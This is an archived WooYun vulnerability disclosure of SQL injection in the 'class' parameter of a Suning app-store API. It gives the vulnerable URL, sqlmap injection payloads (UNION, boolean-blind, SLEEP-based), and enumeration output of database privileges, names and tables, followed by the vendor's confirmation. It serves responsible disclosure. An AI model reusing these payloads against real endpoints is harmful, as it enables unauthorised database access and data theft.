乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-11: 细节已通知厂商并且等待厂商处理中 2014-05-12: 厂商已经确认,细节仅向厂商公开 2014-05-22: 细节向核心白帽子及相关领域专家公开 2014-06-01: 细节向普通白帽子公开 2014-06-11: 细节向实习白帽子公开 2014-06-25: 细节向公众公开
sql注入
我从苏宁易购官方客户端下载了“苏宁应用商店”这款APP..进行了一番检测,获取到该链接:
http://appjson.suning.com/advertise.php?page=1&limit=2&sys=android&class=102其中class参数存在注入..
---Place: GETParameter: class Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=1&limit=2&sys=android&class=102 AND 5199=5199 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: page=1&limit=2&sys=android&class=102 UNION ALL SELECT NULL,CONCAT(0x7166637271,0x7a62704f57775474664d,0x71736a6771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: page=1&limit=2&sys=android&class=102 AND SLEEP(5)---[01:38:32] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.3.6back-end DBMS: MySQL 5.0.11[01:38:32] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\appjson.suning.com'[*] shutting down at 01:38:32
---[01:39:35] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.3.6back-end DBMS: MySQL 5.0.11[01:39:35] [INFO] fetching database users privilegesdatabase management system users privileges:[*] 'root'@'192.168.123.%' [1]: privilege: USAGE[01:39:36] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\appjson.suning.com'[*] shutting down at 01:39:36
available databases [6]:
[*] information_schema[*] suning[*] suning_app_inner[*] suning_ios[*] suning_win[*] test
Database: suning[233 tables]+--------------------------+| Permission || action || group || temporary || activity || ad_indexfocus_img || ad_indexsoft || admin_group || admin_module || admin_promotion || admin_user || admin_user_new || app_client || app_count_app_day || app_count_app_hour || app_count_detail || app_count_device_day || app_count_mobile_day || app_count_user_day || app_device || app_imei || app_push_apps || app_push_log || app_software || app_sys || app_sys_cmd || app_temp || authorize || brand_ext_inner_map || brand_external || brand_mobile_ext || brand_model_map || bug_word || category || category_anzhi || category_icon || cloud_bootscreen || cloud_qrcode_statistics || cloud_res || ctrl || ctrl_copy || ctrltype || ctrltype_copy || department || developer || developer_appeal || developer_msg || device_info || device_statistics || district_day || district_hour || district_month || district_tol || district_week || down_detail || download || download_all || download_day || download_hour || download_month || download_tol || download_week || ego_ad_indexfocus_img || ego_ad_indexsoft || favority || feedback || feedback_detail || friend_links || game_ad_indexfocus_img || game_ad_indexsoft || game_download_all || game_download_day || game_download_hour || game_download_month || game_download_tol || game_guess || game_soft_ranking || game_topic || game_topic_info || guess || h5_category || h5_download_day || h5_download_hour || h5_download_month || h5_download_tol || h5_maintain_soft || h5_soft_tag || h5_software || h5_tag || http_log || imei_day || imei_hour || imei_month || imei_tol || install_day || install_hour || install_month || install_tol || install_week || ip_visit || keyword || list_column || log || logo_icon || manager || market || market_ad || market_cate || market_channel || market_channel_day || market_imei_channel || mobile_brand || model_drive || model_feedback || msg || msg_forbid || news || news_app_map || news_class || news_comment || order_soft || os_day || os_hour || os_month || os_tol || os_week || outer_category || page_ad_indexfocus_img || people_need || people_recommend || privilege || push_id || push_software || qrcode_channel || qrcode_channel_bak || qrcode_channel_url || qrcode_channel_url_bak || quick_entry || ratio_day || ratio_hour || ratio_month || ratio_tol || ratio_week || recommend || report || role_user || score || search_day || search_keywords || search_month || search_soft || search_soft_bak20140417 || search_tol || search_week || sms_statistics || sn_software || soft_guess || soft_ranking || soft_tag || soft_ver_log || software || software_bak20131017 || software_copy || software_log || software_log_copy || software_permission || software_pool || software_safe || spread_money || spread_operation || spread_promotion_goods || spread_promotion_setting || spread_reward || spread_soft_count_day || spread_software || spread_supplier || suit_feedback || suit_statistics || suit_statistics_day || suit_statistics_hour || suit_statistics_month || suit_version || suning_district || suning_store || suning_user || supplier || sys_ad || sys_ad_stat || sys_ad_stat_day || sys_brand || sys_brand_info || sys_cate || sys_soft || sys_topic || sys_topic_info || sys_word || tag || tag_app_map || term_district_day || term_district_hour || term_district_month || term_district_tol || term_imei || term_imei_day || term_imei_hour || term_imei_month || term_imei_tol || term_install || term_install_old || term_install_testlog || term_model_day || term_model_hour || term_model_month || term_model_tol || term_os_day || term_os_hour || term_os_month || term_os_tol || term_ratio_day || term_ratio_hour || term_ratio_month || term_ratio_tol || term_stat_by_imei_day || term_stat_by_pack || term_stat_by_pack_model || topic || topic_info || updatesoft_log || verify_reason || web || web_ad || web_notice || web_tag |+--------------------------+
你们更专业,话说不会还给10RANK把?求15-20RANK..
危害等级:高
漏洞Rank:15
确认时间:2014-05-12 10:16
感谢您对苏宁易购的关注,正在安排人员对此漏洞进行修复。
暂无
